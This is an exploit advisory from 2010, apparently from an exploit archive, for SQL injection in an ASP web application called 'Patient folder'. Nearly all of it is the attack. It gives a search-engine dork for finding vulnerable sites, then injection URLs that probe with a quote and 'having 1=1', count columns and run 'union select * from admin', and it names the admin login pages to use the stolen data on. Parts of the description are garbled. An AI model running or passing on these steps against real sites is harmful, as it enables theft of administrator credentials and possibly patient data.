============================================================
Patient folder (THEME ASP) Local SQL Injection Vulnerability
============================================================
-----------------------------------
By: SA H4x0r -
Emails: ww0@hotmail.com -
Date: 2010/05/31 -
-----------------------------------
=====================================================================
Search: "profil.asp?id=" OR "asp?id="
Author: SA H4x0r
Contact: ww0[at]hotmail.com
Data: 2010-05-31
=====================================================================
Description:
Inject script asp to tell the script to take them infected ..
=====================================================================
--=[ Vuln C0de ]=-
[-] com/profil.asp?id
[-] xxx/xxxxxx.asp?id
-----------------------------------------------------------------------------------------
Directions:
http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not
http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream
Look:
[Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation.
okey ;)
http://[Site].com/profil.asp?id=1 order by 1
http://[Site].com/profil.asp?id=1 union select * from admin
Control panel: http://[Site].com/admin "OR" http://[Site].com/login
-----------------------------------------------------------------------------------------
-=[ P0C ]=-
http://127.0.0.1/profile/profil.asp?id=[SQL ASP]
http://127.0.0.1/.asp?id=[SQL ASP]
=========================| -=[ E0F ]=- |=========================
Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr
